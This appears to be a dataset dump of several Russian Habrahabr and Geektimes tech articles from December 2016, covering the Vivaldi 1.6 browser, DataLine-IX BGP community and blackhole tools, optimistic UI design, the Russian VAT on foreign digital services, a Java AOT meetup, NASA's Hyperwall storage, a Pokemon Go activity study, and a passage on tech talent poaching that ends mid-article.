Всем привет! Новый год уже не за горами, и коллектив разработчиков браузера Vivaldi подготовил небольшой подарок всем пользователям — новую версию Vivaldi 1.6. Учитывая, что с момента выхода предыдущей стабильной версии под номером 1.5 прошло совсем немного времени, можно было бы предположить, что мы ограничимся исправлением ошибок и недочётов, выявленных после релиза. Но мы этим не ограничились. Подробности — ниже.
Но сначала пара слов про исправления. Исправлений с прошлой стабильной версии набралось достаточно, чуть меньше пятидесяти (не считая дублей), весь список находится на данной странице . Посмотрите сами — наверняка там есть и то, что мешало вам в работе с браузером Vivaldi. А мы пока посмотрим, что появилось нового. Список небольшой и весь связан с вкладками — с одним из самых важных компонентов браузера: Уведомления во вкладках
Переименование группы вкладок
Выделение вкладок по домену
Теперь подробнее о каждой новой функции. Уведомления во вкладках
Сегодня мы работаем с множеством динамически обновляющих контент веб-сайтов. Это могут быть почтовые серверы, чаты, форумы, сервисы мгновенных сообщений и многое другое. Главная особенность таких сайтов — они постоянно обновляются и на их страницах появляются новые данные, которые могут представлять для вас интерес. Но есть одна проблема: как правило, в наших браузерах всегда открыто множество вкладок, и для того, чтобы определить, на какой из них обновились данные, нужно эту страницу вновь посетить. И в результате наш день проходит в постоянном перескакивании с вкладки на вкладку в стремлении не пропустить важное сообщение.
Мы решили эту ситуацию исправить. Замечу: первыми из всех браузеров. Теперь, включив в настройках браузера (раздел Вкладки) опцию «Искать уведомления в заголовках», вы будете видеть время от времени подобные уведомления на вкладках:
Вот этот синий кружочек с циферкой и есть новшество, которого нет у других. Да, сегодня придумать что-то новое, чего нет в других браузерах, весьма сложно, а вы как думали? Так что, как говорится, это один шажок для браузера, но гигантский скачок для браузерной индустрии… Впрочем, я, кажется, несколько увлёкся.
Работает это просто: браузер проверяет заголовок страницы на наличие некоего циферного индекса, заключённого в круглые скобки, и если находит такой — выводит его в виде визуального информатора прямо на вкладке. Если цифра от 1 до 9 — будет отображаться цифра, если больше — будет отображаться плюсик. Но будьте готовы, что индикация пока не очень уверенно работает. Так, например, в моей почте более 20 тысяч сообщений, и браузер не справился с определением — я подозреваю, что это из-за пробела между тысячным и сотенным разрядами. Баг-репорт отправил. Переименование группы вкладок
Эта функция окажется полезной тем, кто привык оперировать множеством сгруппированных вкладок. Ранее по умолчанию на сгруппированных вкладках отображался заголовок одной из входящих в группу страниц. Но мы решили дать вам возможность назначать собственное имя всей группе — по нашей задумке это должно помочь легче находить нужную группу вкладок среди множества других. Воспользоваться функцией просто. В настройках браузера (всё тот же раздел вкладки) включаем опцию «Разрешить переименование групп вкладок», после этого в контекстном меню групп вкладок появляется соответствующий пункт:
После переименования вы получите группу с единым названием для всех вкладок группы:
Для того, чтобы сбросить новое имя группы и вернуть прежнее (взятое из заголовка страницы), воспользуйтесь тем же пунктом контекстного меню и просто удалите название и нажмите Enter. В общем, вот такой вот пустячок. Выделение вкладок по домену
Теперь полезная функция для тех, кто весьма активно работает с множеством открытых страниц с одних и тех же веб-сайтов. Согласитесь, что иногда после активной работы вкладки нередко так перемешиваются, что бывает трудно определить, что где открыто, или просто вы поработали со множеством страниц с одного домена и они вам больше не нужны. Если вы всё ещё пользуетесь обычным браузером, тогда мы идём к вам… то есть, я хотел сказать, что если вы пользуетесь обычным браузером, то у вас один выход: закрывать все ненужные вкладки одна за одной. Скучно, долго, монотонно. А если у вас браузер Vivaldi, то вы можете воспользоваться новой функцией — закрытие вкладок с одного домена. Для этого нажимаете и удерживаете клавишу Ctrl (или клавишу с магическим знаком ⌘ , если вы её видите на своём компьютере), а затем производите двойной клик на вкладке, предназначенной для закрытия. Результат будет выглядеть примерно так:
Как видите, все вкладки с этого же домена также окажутся выделенными. Теперь вы можете их все закрыть — например, комбинацией клавиш Ctrl(⌘)+W . А можете не закрывать, а разместить их для одновременного просмотра в одном окне. А можете сгруппировать. В общем, всё в ваших руках.
Пожалуй, на этом можно сегодня и закончить. Надеемся, что новые функции вам придутся по душе, а также ждём ваших замечаний и пожеланий.
Ознакомиться с подробным списком исправлений и изменений можно на данной странице .
Загрузить браузер можно с официального сайта: https://vivaldi.com/
Как всегда, ждём ваших сообщений об ошибках и пожеланий по прежнему адресу . | https://habrahabr.ru/company/vivaldi/blog/317676/ |
habrahabr | Своя точка обмена трафиком в дата-центре. Часть 2. Инструменты для участников DataLine-IX | ['точка обмена трафиком', 'IX', 'BGP community', 'BGP blachole', 'looking glass', 'сетевая инфраструктура', 'dataline-IX', 'dataline'] | Сегодня мы продолжаем говорить о точке обмена трафиком DataLine-IX. Первая часть была посвящена устройству нашей точки обмена трафиком. В этом посте расскажем про пару инструментов, которые... | Сегодня мы продолжаем говорить о точке обмена трафиком DataLine-IX. Первая часть была посвящена устройству нашей точки обмена трафиком. В этом посте расскажем про пару инструментов, которые пригодятся ее участникам в работе. Одно из помещений Meet-Me-Room на площадке OST. Личный кабинет Личный кабинет DataLine-IX сделан на базе open-source проекта IXP Manager . Здесь собирается статистика по трафику участника и информация по связности с другими участниками. Главная страница Личного кабинета.
Скроллом статистика по трафику группируется по 12 часам, суткам, неделям и месяцам. Анализировать можно не только bit rate, но и packet rate, ошибки, количество отброшенных пакетов.
Здесь же можно посмотреть статистику распределения своего трафика по другим участникам DataLine-IX.
Через Личный кабинет участник может запросить прямое присоединение ( private peering ) к другим пирам.
Во вкладке “Интерфейсы” содержится информация о параметрах подключения участника к DataLine-IX. BGP Community Tool
BGP Сommunity – это своего рода тэг, которым помечается маршрут. Когда RS получает маршрут с community, то он может выполнять определенные действия, основанные на значении атрибута.
Обычно community записывается в виде ASN:VALUE, т.е. номер автономной системы и значение community, которое определяет политику маршрутизации трафика. Для IX обычно используется другой формат: ACTION:VARIABLE, т.е. действие и переменная. ‘0’ в качестве действия означает запрет на анонсирование, номер AS DataLine-IX – разрешение.
По номеру AS нашей IX есть один нюанс: изначально он 203921, но поскольку BGP standard community в качестве ASN или Value могут принимать только 2 байта, то используется mapping (перевод) четырехбайтных ASN в двухбайтные. Поэтому номер AS DataLine-IX 203921 мапится в 64921.
С помощью BGP Community участники DataLine-IX могут управлять исходящими и входящими анонсами маршрутов, отражать DDoS-атаки. Управление исходящими и входящими анонсами маршрутов. На RS DataLine-IX уже настроены фильтры для управления входящими и исходящими анонсами. Участнику остается только прописать в своих анонсах соответствующие community в сторону точки обмена трафиком. Информация по community для DataLine-IX на RIPE NCC .
Вот пример фильтрации исходящих анонсов с помощью community: Участник DataLine-IX – AS 49063 – хочет анонсировать маршруты всем участникам в Киеве, кроме участника AS 35297, и запрещает анонс всем участникам по всей Украине.
BGP COMMUNITY в анонсируемых префиксах будут выглядеть так: 0:35297 – запрет на анонс маршрутов для участника АS 35297.
64921:64611 – анонс разрешен всем участникам в Киеве.
0:64610 – запрет на анонс на всю Украину.
С входящими анонсами проще. Все маршруты прилетают уже с определенным community. Каждый соответствует какому-то городу и региону. Участник на своей стороне просто решает, принимать их или нет: 64921:64700 – анонсы маршрутов из России.
Стоит отметить, что геопринадлежность определяется исключительно местоположением оборудования участника, которое устанавливает BGP сессию с RS.
Для наглядного примера возьмем фрагмент конфигурации BGP на маршрутизаторе Cisco. Исходя из вышеуказанных правил, настройки буду выглядеть следующим образом: Защита от DDoS-атак в IX с помощью BGP Blackhole. BGP Blackhole позволяет фильтровать вредоносный трафик еще до попадания в AS участника, т. е. на портах IX.
Этот способ предназначен для отражения атак на полосу пропускания каналов, в нашем случае – это линк между участником и DataLine-IX. При использовании BGP Blackhole участник жертвует доступностью хоста, зато DDoS не забьет весь канал и не затронет остальные сервисы.
В реализации BGP Blackhole также применяется community: маршруты для атакуемого хоста помечаются специальным community – 0:666. Во время атаки маршрут с этим community анонсируется на RS, который распространяет маршрут остальным участникам, подменяя Next-hop на специально выделенное значение.
Рассмотрим работу BGP Blackhole пошагово. Представим, что атакуемый хост находится в AS 64512 (IP 10.10.10.10): Администратор AS 64512 создает маршрут (10.10.10.10/32), помеченный community 0:666, и анонсирует этот префикс в сторону RS.
RS, видя community 0:666, подменяет Next Hop на специально зарезервированный адрес 185.1.52.66 и распространяет этот машрут остальным участникам (на картинке AS 64513). В дальнейшем RS будет отвечать на ARP-запросы для хоста 185.1.52.66 MAC-адресом 0066.0066.0066.
Если из AS 64513 идет трафик на атакуемый IP 10.10.10.10, то маршрутизатор в AS 64513 отправляет трафик с DMAC 0066.0066.0066.
Далее трафик «отбрасывается» на порту, в который подключен AS 64513, и не попадает на порт атакуемого участника. Схема работы BGP Blackhole.
Looking Glass
Ну и конечно же у DataLine-IX есть свой Looking Glass . Здесь в режиме онлайн можно посмотреть: Состояние BGP-сессий всех участников.
UP – сессия установлена, Down – сессия не установлена, Start/Passive – сессия настроена со стороны DataLine-IX, и мы ожидаем, когда участник отправит нам запрос на установлении сессии.
детальную статистику по отдельным маршрутам для IPv4 и IPv6.
отображение AS PATH в виде графа.
Это всё, что мы хотели рассказать об инструментах DataLine-IX. Задавайте вопросы в комментариях, если что-то осталось за кадром. | https://habrahabr.ru/company/dataline/blog/317670/ |
habrahabr | Кратко про оптимистичный UI. Оптимистичные интерфейсы в картинках | ['UI', 'user experience', 'user interfaces', 'user experience design', 'оптимистичный ui', 'интерфейсы', 'переводы'] | Не так давно на сайте Smashing Magazine появилась статья Дениса Мишунова, с переводом котрой можно ознакомиться на Хабре.
Вслед за этой статьей вышла еще одна – «Optimistic UIs in under... | Не так давно на сайте Smashing Magazine появилась статья Дениса Мишунова, с переводом котрой можно ознакомиться на Хабре .
Вслед за этой статьей вышла еще одна – « Optimistic UIs in under 1000 words » за авторством Игоря Мандригина, в которой он затрагивает ту же тему, дополняя ее и иллюстрируя большим количеством примеров. Предлагаем вашему вниманию перевод. Кратко про оптимистичный UI. Оптимистичные интерфейсы в картинках.
Давайте сегодня поговорим об оптимистичном UI дизайне. В каком смысле оптимистичном?
Оптимистичные интерфейсы не ждут завершения операции. Они сразу же переходят в конечное состояние, показывая фейковую информацию, пока операция все еще выполняется. На словах все это звучит довольно запутанно, поэтому давайте лучше обратимся к первому примеру. Для наглядности возьмём выдуманный мессенджер и назовём его Cotton Candy. Существует два подхода к представлению процесса отправки сообщения: Не оптимистичный (слева) против оптимистичного (спрва)
Итак, оптимистичный UI дизайн показывает конечное состояние до того как приложение в действительности заканчивает (или даже начинает) операцию. То есть это просто фокус. Зачем тогда это нужно?
Идея, которая скрывается за замысловатым названием, очень проста. Тем не менее, это может оказать огромное влияние на впечатление ваших пользователей (или «удовлетворить клиента», если вы Apple). Во-первых, это создает ощущение, что приложение работает быстрее, как бы «ускоряя» ваше приложение. Пользователь может сделать что-то еще, пока приложение загружает потешную фотку с котиком или отправляет ироничный комментарий в дискуссию. Во-вторых, это упрощает взаимодействие с интерфейсом, убирая лишние состояния и отвлекающие факторы. Приложение выглядит более простым и доступным. Да и UI дизайнерам придется меньше экранов доводить до состояния Pixel-Perfect. Примеры из жизни
Оптимистичный интерфейс часто используется в мессенджерах и социальных приложениях. Messages для iOS или MacOS прибегают к этой концепции, когда пользователь отправляет сообщение. Незамедлительное обновление интерфейса в Messages на Mac.
Инстаграм применяет подобное же решение для добавления комментариев: Комментарии в Instagram. Обратите внимание на индикатор прогресса справа.
Давайте рассмотрим пример другого плана: приложение Audible – проигрыватель для аудиокниг на iOS. Как только небольшой фрагмент записи подгрузится, пользователь сразу может начать прослушивание, пока остальная часть трека догружается. Как только часть книги загрузится, появляется надпись «Ready to play». Оптимизм в чистом виде.
Еще один пример — Trello: когда пользователь передвигает карту, она перемещается немедленно, интерфейс не ждет, пока сервер закончит свою работу. Optimistic UIs are key to Trello’s fluency
Оптимистичные интерфейсы – ключевая фишка удобства Trello
Медиум использует подобную технологию, когда пользователь прикрепляет картинку к посту.
Наверняка, подобная фишка применима и к вашему продукту. Прогресс
Иногда немедленно показать финальное состояние недостаточно. Пользователь будет чувствовать себя менее растерянным, если вы деликатно дадите ему понять, что процесс идет. Это особенно важно, когда происходит ошибка. Но сообщения об ошибке — отдельная тема, о них мы поговорим позже.
Само собой, чем больше времени занимает операция, тем более заметна должна быть индикация.Когда пользователь ставит лайк, индикация не обязательна, а вот когда подгружает свою любимую фотографию – демонстрация индикатора определенно будет полезна. Некоторые приложения показывают индикацию прогресса рядом с уже обновленной частью интерфейса. Отображение прогресса рядом с сообщением
Другой способ — добавить маленькую иконку или ярлычок, демонстрирующие статус отправки сообщения рядом с ним. Иконки статуса (Facebook Messenger)
Сообщения на iOS вдобавок выдают индикатор состояния поверх окна. Особенно он бросается в глаза, когда загружаешь потешную фотку с котиком (одну или много). Индикация прогресса в приложении Messages в iOS Сообщения об ошибке
А если что-то пошло не так? При проектировании сообщения об ошибке следует обратить внимание на следующее:
1. Заметность . Оповещение должно быть хорошо видно, чтобы пользователь никак не мог его пропустить (особенно в тех случаях, когда загружает данные).
2. Причинность . Пользователю должно быть понятно, какое именно из его действий вызвало ошибку. Ведь интерфейс уже обновился, а значит, операция воспринимается как завершенная.
Сообщения об ошибке — самая сложная задача для дизайнера оптимистичных интерфейсов.
Самое простое решение — это, конечно, Good Old bLocking Error Message (GOLEM) — старое доброе блокирующие окошко. GOLEM в действии!
Оно отлично подходит к первому пункту. Окно диалога по центру экрана очень сложно не заметить, но оно грубо блокирует все дальнейшие взаимодействий с приложением. Но вот второму пункту это решение не соответствует: пользователь не связывает ошибку с тем, что делал до этого. Окно диалога появляется на экране совершенно неожиданно, да еще и с таким грозным текстом.
Другое распространенное решение —показать кнопку или иконку рядом с сообщением, которое не удалось отправить. WhatsApp, не надо так!
Когда пользователь нажимает на нее, показываем диалог GOLEM или пытаемся повторить действие без диалога. Диалог GOLEM вызывается нажатием на индикатор ошибки (приложение Messages в iOS)
Здесь, напротив, все в порядке с причинно-следственными связями (пункт 2), но, к сожалению, не достаточно заметно. Если юзер уже переключился на другой экран или прокрутил переписку, оставив сообщение за пределами экрана, оповещения он не увидит.
Приложение Messages в iOS решает эту проблему добавлением дополнительных индикаторов, чтобы более навязчиво сообщить о статусе ошибки. Индикатор отображается прямо на иконке приложения, так что пользователь заметит его, даже если совсем выйдет из мессенджера. Messages намекает нам, что что-то пошло не так
Чтобы уменьшить необходимость показывать статус ошибки и не пугать пользователя, иногда достаточно повторить операцию несколько раз. Заключение
Оптимистичный UI может сделать работу с вашим приложением быстрее, проще и приятнее для пользователей. Также это отличный выход из положения, если ваши серверы довольно медлительны (да еще и админ уволился на прошлой неделе). Но вместе с тем, оптимизм в оптимистичных интерфейсах должен быть обоснован.
Если ваши серверы совсем уж ненадежны (черт бы побрал этого админа), оптимистичный интерфейс может и навредить. Бесконечная очередь сообщений об ошибках будет раздражать пользователей, а не замеченное вовремя оповещение может привести к потере введенных данных.
Так что принимайте все эти соображения во внимание и пользуйтесь данным решением с умом! | https://habrahabr.ru/company/everydaytools/blog/317664/ |
habrahabr | Кто будет платить НДС? Google и Amazon уже все решили | ['ндс на интернет-услуги', '+18%', 'несите ваши денежки'] |
Многие задаются вопросом: «Кто и как из западных компаний будет платить НДС в России?». В Google этот вопрос уже решили — платить будут пользователи. По крайней мере в том, что касается... |
Многие задаются вопросом: «Кто и как из западных компаний будет платить НДС в России?» . В Google этот вопрос уже решили — платить будут пользователи . По крайней мере в том, что касается подписок. Такой вывод можно сделать из письма, которое пришло мне сегодня утром: Здравствуйте!
В 2017 году будет изменено российское законодательство об НДС. В результате общая стоимость Ваших подписок может увеличиться на 18% . Новая цена станет доступна после 1 января 2017 года, когда подписки возобновятся. Если Вы не хотите продлевать какую-либо подписку, просто отмените ее.
С уважением, команда службы поддержки Google Play
Google Ireland Ltd, Gordon House, Barrow Street, Dublin 4, Ireland.
Хочется обратить внимание на слово «может», наверное это потому, что пока нет механизма регулирующего взимание НДС с иностранных компаний, но за этим дело не станет — наши законотворцы постараются что нибудь придумать.
Ждем писем касающихся других услуг Google, а так же аналогичных писем от Amazon, Microsoft, Apple и, может быть даже, от AliExpress.
Аналогичное письмо про НДС на Google Диск: Здравствуйте!
Сообщаем Вам, что начиная с 1 января 2017 г. в Ваши счета на оплату пользования Google Диском будет включен налог на добавленную стоимость. В соответствии с законом, принятым Государственной Думой Российской Федерации, с 1 января 2017 года НДС в размере 18% будет распространяться на всех клиентов Google Диска, являющихся резидентами России.
Компания Google не может предоставить Вам налоговых консультаций и рекомендует обратиться со всеми вопросами в отношении этого изменения к Вашему налоговому консультанту.
Это служебное уведомление направлено всем российским подписчикам Google Диска. Оно не влияет на статус и активность Вашего аккаунта.
С уважением,
команда Google Диска.
Так что, если у кого-то и были сомнения, что иностранные компании не станут платить НДС по новым русским законам — можно больше не сомневаться.
UPD: становится актуальной инициатива: " АКИТ предлагает блокировать сайты зарубежных магазинов, которые не платят НДС в России"
UPD: Аналогичное письмо пришло от AWS
Вас приветствует Amazon Web Services,
Сообщаем Вам, что с 1 января 2017 года вступает в силу новый порядок обложения НДС услуг в электронной форме, в соответствии с которым у компаний Amazon Web Services, Inc. («AWS») и AWS Marketplace возникнет обязанность по начислению НДС по ставке 18% в отношении услуг, оказываемых российским клиентам, не зарегистрированным в качестве юридических лиц или индивидуальных предпринимателей, то есть не имеющим соответствующий основной государственный регистрационный номер («ОГРН») или основной государственный регистрационный номер индивидуального предпринимателя («ОГРНИП»).
Если Вы находитесь в России и являетесь юридическим лицом или индивидуальным предпринимателем, пожалуйста, прочитайте внимательно следующую информацию:
Для подтверждения Вашего статуса в качестве юридического лица или индивидуального предпринимателя в целях применения существующего порядка выставления счетов без внесения изменений, AWS необходимо получить информацию о Вашем ОГРН или ОГРНИП и проверить ее соответствие официальным данным.
Как можно раньше, но не позднее 31 декабря 2016 года, пожалуйста, внесите информацию о Вашем ОГРН (13-значный номер) или ОГРНИП (15-значный номер) на нашей странице, касающейся налогообложения ( https://console.aws.amazon.com/billing/home#/tax ) в отношении каждого Вашего аккаунта AWS. В случае успешного обновления информации, Вы получите от нас сообщение с подтверждением.
Если Вы не предоставите информацию о Вашем ОГРН или ОГРНИП до 31 декабря 2016 года, AWS будет вынуждена начислять НДС по ставке 18% в отношении соответствующих услуг. У Вас всегда будет возможность внести информацию после указанной даты (по ссылке, указанной выше). В таком случае, после внесения изменений и получения нашего сообщения с подтверждением, Вы можете направить запрос о возврате НДС, уплаченного после 1 января 2017 года, в отношении каждого аккаунта, по которому внесена соответствующая информация, в службу поддержки клиентов по ссылке: https://aws.amazon.com/support .
Вы можете найти дополнительную информацию в отношении нового порядка обложения НДС услуг в электронной форме на сайте Федеральной налоговой службы Российской Федерации: http://lkio.gnivc.ru/en (английская версия) или http://lkio.gnivc.ru/ru (русская версия).
Спасибо, что пользуетесь услугами Amazon Web Services.
С уважением,
Amazon Web Services, Inc.
UPD: Не смотря на то, что в комментариях многократно говорили, что: «Все любят деньги, НДС будет платить покупатель» — так поступают не все! Налог на игры: изменятся ли цены в World of Tanks ?
Уважаемые игроки!
С 1 января 2017 года в Российской Федерации вводится новый налог на добавленную стоимость (НДС) 18% на все внутриигровые платежи. Мы приняли решение пойти навстречу игрокам и полностью взять уплату НДС на себя. С 1 января изменения цен на игровое имущество в World of Tanks не будет.
Вперёд, к новым победам в World of Tanks по старым правилам! | https://geektimes.ru/post/283720/ |
habrahabr | [Питер] Дмитрий Чуйко — JEP 295: Ahead-of-Time компиляция для HotSpot | ['jug', 'jug.ru', 'java', 'aot', 'ahead-of-time', 'jdk', 'jvm', 'java9'] |
В четверг 22 декабря в 20:00 в петербургском офисе компании Oracle состоится встреча JUG.ru c Дмитрием Чуйко, инженером Oracle из Java SE Performance Team. Тема встречи — Ahead-of-Time компиляция... |
В четверг 22 декабря в 20:00 в петербургском офисе компании Oracle состоится встреча JUG.ru c Дмитрием Чуйко , инженером Oracle из Java SE Performance Team. Тема встречи — Ahead-of-Time компиляция для HotSpot JVM .
Существуют различные реализации платформы Java. В некоторых из них есть Ahead-of-Time (AOT) компиляторы, причём подход к решению различный, да и постановка задачи разная. В данный момент в HotSpot есть JIT‑компиляция, но нет стандартного AOT. Но не обязательно, что так будет всегда.
Мы поговорим о том, зачем может понадобится заранее получать нативный код, как это делается и работает в реализации для HotSpot. И с другой стороны, как Java-код может встраиваться в процесс JIT‑компиляции.
Недавно эта фича назначена в релиз JDK 9. Обсудим, что имеется в виду в описании JEP 295 и существующую реализацию в этом контексте. Попробуем что-нибудь статически скомпилировать и сравнить результаты. Вход свободный. Регистрация ТУТ .
Онлайн-трансляции не будет, но будет видеозапись, которая будет выложена на наш канал Youtube и в соцсети JUG.ru. | https://habrahabr.ru/company/jugru/blog/317678/ |
habrahabr | Система Hyperwall от НАСА теперь использует СХД vFlash | ['nasa', 'ит-инфраструктура'] | Hyperwall НАСА — это видеостена, состоящая из огромного массива мониторов и способная отображать множество изображений в высоком качестве одновременно. Эта установка нужна агентству для... | Hyperwall НАСА — это видеостена , состоящая из огромного массива мониторов и способная отображать множество изображений в высоком качестве одновременно. Эта установка нужна агентству для визуализации феноменов, идей и изменений, происходящих в мире и имеющих отношение к астрофизике, гелиофизике и планетоведению. Для этого используются данные, получаемые НАСА с телескопов и спутников.
Вычислительная ферма НАСА располагается в Исследовательском центре Эймса. Там ведутся работы над проектом HECC, который позволяет ученым и инженерам проводить симуляции, моделирование и аналитические работы в крупных масштабах для расчетов всех миссий Космического агентства. / Flickr / Steve Jurvetson / CC
Hyperwall была разработана как часть этого проекта. Стена состоит из 16 столбцов и 8 строк мониторов для отображения результатов симуляций. Одним из примеров такой симуляции может служить проект «Схема течений и климатических особенностей океана» (Estimating the Circulation and Climate of the Ocean, ECCO ), цель которого обеспечить визуальную модель мирового океана.
Подобные модели (примеры которых вы можете найти по ссылке ) включают в себя огромные своды многомерных данных, генерируемых суперкомпьютерами НАСА. Поэтому перед инженерами встала нетривиальная задача обеспечения параллельного доступа к данным для всех 128 вычислительных узлов, обрабатывающих информацию с неопределенным числом случайных входных и выходных параметров. В качестве решения была использована виртуальная система хранения данных на основе NVMe-накопителей.
Интерфейс NVMe спроектирован с целью максимизации преимуществ твердотельных накопителей, которые обладают низкой латентностью и позволяют конвейеризировать операции чтения и записи. NVMe содержит целый ряд усовершенствований, направленных на уменьшение паразитных задержек при работе с данными по сравнению с интерфейсом SATA и протоколом AHCI.
Стоит отметить, что технология NVM приобрела на рынке определенную популярность. И сразу несколько компаний планируют наладить (или наладили) выпуск накопителей класса NVMe для потребительского рынка. Toshiba и Plextor уже выпустили свое решение в массы, а продукт от Western Digital увидит свет в начале 2017 года.
Новые WD Black будут выполнены в формате M.2 NVMe, что подразумевает использование четырёх линий PCI Express 3.0 с совокупной пропускной способностью 32 Гбит/с. Характеристики новых WD неизвестны, но если предположение об используемом контроллере подтвердится, от них следует ждать скоростей, аналогичных тем, которые показывают продукты других компаний, а именно Toshiba OCZ RD400 и Plextor M8Pe.
Разрабатывая систему, инженеры НАСА сперва поместили в каждый вычислительный узел флеш-накопитель объемом 2 ТБ. Затем программисты разбили данные на блоки по 2 ТБ и скопировали их на каждый диск. Однако затем они столкнулись с определенными трудностями: дальнейшая обработка должна была учитывать местоположение данных во время вычислений, что усложняло процесс программирования. Решением этой проблемы стала технология NVMesh. / Flickr / Steve Jurvetson / CC
Все 128 накопителей по 2ТД были агрегированы в пул — виртуальную систему хранения данных объемом 256 ТБ, доступ к которой осуществляется по RDMA. При этом каждый флеш-накопитель как бы остался локальным для каждого нода, но это упростило процедуру параллельного доступа к ним.
Такой подход добавил 5 мкс задержки (в основном по вине сетей) по сравнению с локальным размещением, однако исключил сложности, связанные с программированием решения. Согласно тестам, пропускная способность системы составила порядка 140 ГБ/с. Такой подход позволил проводить ученым и инженерам более быстрые и «гладкие» симуляции, повышая продуктивность проводимых исследований.
Другие материалы из блога ИТ-ГРАД на Хабре: Вопросы и ответы о связи и технике в космосе ( часть 1 и часть 2 )
Как облачные технологии меняют мир спорта
IaaS-дайджест: Знакомство с виртуальной инфраструктурой
«В чем выгода»: Технико-экономическое обоснование использования IaaS
| https://habrahabr.ru/company/it-grad/blog/316284/ |
habrahabr | Исследование: Pokemon Go повышает уровень физической активности, но ненадолго | ['pokemon go', 'здоровье', 'физическая активность'] |
Физическая активность взрослых игроков Pokemon Go повышается, но эффект умеренный и кратковременный. К такому выводу пришли исследователи из Гарвардского университета.
Результаты показали,... |
Физическая активность взрослых игроков Pokemon Go повышается, но эффект умеренный и кратковременный. К такому выводу пришли исследователи из Гарвардского университета.
Результаты показали, что среднесуточное количество шагов в течение первой недели после установки игры увеличилось на 955 дополнительных шагов, что эквивалентно половине нормы, рекомендованной Всемирной организацией здравоохранения для физической активности в неделю.
Последующие недели наблюдалось постепенное сокращение числа шагов, и этот эффект исчезал вовсе после 6 недель игры. Было высказано предположение, что игра может повысить физическую активность и укрепить здоровье населения, поскольку стимулирует ходьбу, но эта гипотеза не находила подтверждения.
Ученые Кэтрин Хоу (Katherine Howe) Кристиан Сухарлим (Сhristian Suharlim) и Питер Уэда (Peter Ueda) задались целью определить, оказывает ли игра какое-то влияние на физическую активность среди молодых людей в Соединенных Штатах. Они провели онлайн-опрос 1182 тренеров покемонов в возрасте 18-35 лет, которые играли в игру на своих iPhone 6 в течение августа 2016 года. В выборку попали владельцы именно этих смартфонов по той причине, что устройства от Apple автоматически фиксируют количество шагов, которые делает владелец смартфона при переносе устройства, начиная с iOS 8. Это позволило ученым проанализировать физическую активность участников эксперимента за два месяца до установки Pokemon Go и сравнить показатели.
По результатам опроса, 560 участников исследования (47,4%) находились на 5 уровне игры или выше, которого можно достичь после порядка двух часов ходьбы. 90% всех игроков, принимавших участие в эксперименте, установили Pokemon Go в течение 10 дней после выхода. Игра была распространена среди различных подгрупп населения, но как правило, более юные пользователи имели более низкий уровень образования и доход, страдали от излишнего веса и были склонны проводить наедине с собой больше времени, чем в обществе других людей, по сравнению с более взрослыми испытуемыми.
За месяц до установки Pokemon Go участники прошли в среднем 4256 шагов в день. Соответствующие показатели для тех участников эксперимента, что игру не устанавливали, оказались на уровне 4126 в день. После установки игры количество шагов среди пользователей резко увеличилось, а у тех, кто в нее не играл, ожидаемо осталось без изменений. Среднее количество ежедневных шагов и 95% доверительный интервал за неделю до установки Pokemon Go и после (медиана 8 июля 2016 года).
Результаты показали, что количество шагов, которое участники проделывают ежедневно в течение первой недели после установки игры, увеличилось на 955. Если предположить, что участники эксперимента в среднем делали шаги длиной 0,8 м в темпе 4 км/ч, то мы получаем 11 минут дополнительной ходьбы – приблизительно половину рекомендованной ВОЗ нормы. Однако в течение следующих 5 недель количество шагов постепенно уменьшается, а на шестой неделе их число опускается до уровня перед установкой. Ученые уточняют, что результаты не зависели от пола, возраста, расы, индекса массы тела, города или района проживания. Среднесуточное число шагов до и после установки Pokemon Go. Доверительные интервалы оцениваются с использованием разницы в регрессиональных моделях.
Исследователи считают, что влияние игры на здоровье нельзя назвать впечатляющим – скорее, умеренным. Мероприятия, направленные на повышение физической активности, предполагают увеличение количества шагов до 2500 в день. Даже если бы меньшая физическая активность также была бы важна для здоровья, то увеличение количества шагов от Pokemon Go, как и многие другие вмешательства в области физической активности, не поддерживаются людьми в течение долгого времени. Игра также может повлечь за собой риски, например, травмы или ДТП.
У исследования также есть свои ограничения. Шаги записывались тогда, когда испытуемые несли смартфон. Это может привести к завышению эффекта от Pokemon Go, поскольку участник эксперимента может проявлять физическую активность, например, играть в футбол или другие подвижные игры, в то время как телефон находится в кармане. В таком случае шаги запишутся в счет Pokemon Go, хотя в этот момент участник исследования занимался совсем другими делами. Еще точность исследования также ограничена точностью педометра iPhone. Хотя связь между игрой и увеличением физической активности была непрочной и кратковременной, некоторые люди могли существенно увеличить физическую активность благодаря игре. Кроме того, эффект от Pokemon Go может отличаться от того опыта, который получают дети от взаимодействия с игрой, однако их не учитывали в исследовании. Тем не менее, ученые считают, что от игры можно получить и потенциальные выгоды, например, увеличение социального взаимодействия и улучшение настроения.
Pokemon Go – игра, основанная на технологии дополненной реальности, в которой пользователи ищут покемонов в реально существующих местах. С момента своего запуска в июле 2016 года игра была загружена более 500 миллионов раз по всему миру, но уже в сентябре интерес к Pokemon Go среди пользователей снизился. Ученые уверены, что игры, стимулирующие повышение физической активности, потенциально могут поддерживать полезные привычки. Так, игрокам Pokemon Go приходится много гулять по городу, чтобы поймать как можно больше разных видов покемонов.
Научная работа опубликована в журнале the BMJ 13 декабря 2016 года
DOI: BMJ 2016; 355: i6270 | https://geektimes.ru/post/283708/ |
habrahabr | Эти компании переманивают специалистов в области цифровых технологий у всех остальных | ['head hunting', 'переманивание персонала', 'human resources', 'hr-процесс', 'hr-brand', 'hr-бренд', 'эйчар', 'подбор персонала', 'человеческие ресурсы', 'цифровые технологии'] |
Возможно, в IBM и Nike очень хорошо работается, но они вынуждены вести утомительную войну за кадры в области цифровых технологий, в которой не всегда удается победить даже Google.
Хотите... | Возможно, в IBM и Nike очень хорошо работается, но они вынуждены вести утомительную войну за кадры в области цифровых технологий, в которой не всегда удается победить даже Google.
Хотите узнать, насколько высок уровень инноваций в определенной компании? Посмотрите на специалистов, которых она притягивает или, наоборот, теряет. Сегодня привлечь и сохранить ведущих специалистов в сфере высоких технологий — задача непростая.
Многие компании обманывают себя, думая, что для соответствия текущим стандартам в данной области достаточно изменить названия существующих должностей и ввести новые, которые будут содержать «по цифровым технологиям». Число профессионалов, называющих себя «директорами по цифровым технологиям», в LinkedIn поднялось с 965 человек в 2015 году до 3255 в 2016, то есть рост составил 237%.
Такой семантический сдвиг маскирует под собой суровую реальность. Лишь небольшая группа компаний — те, что всегда жили за счет цифровых технологий (не путайте их с «прирожденными айтишниками»), — забирает себе топовых профессионалов , заставляя остальных выбирать лишь «лучших из худших». Невидимая (работающая) рука
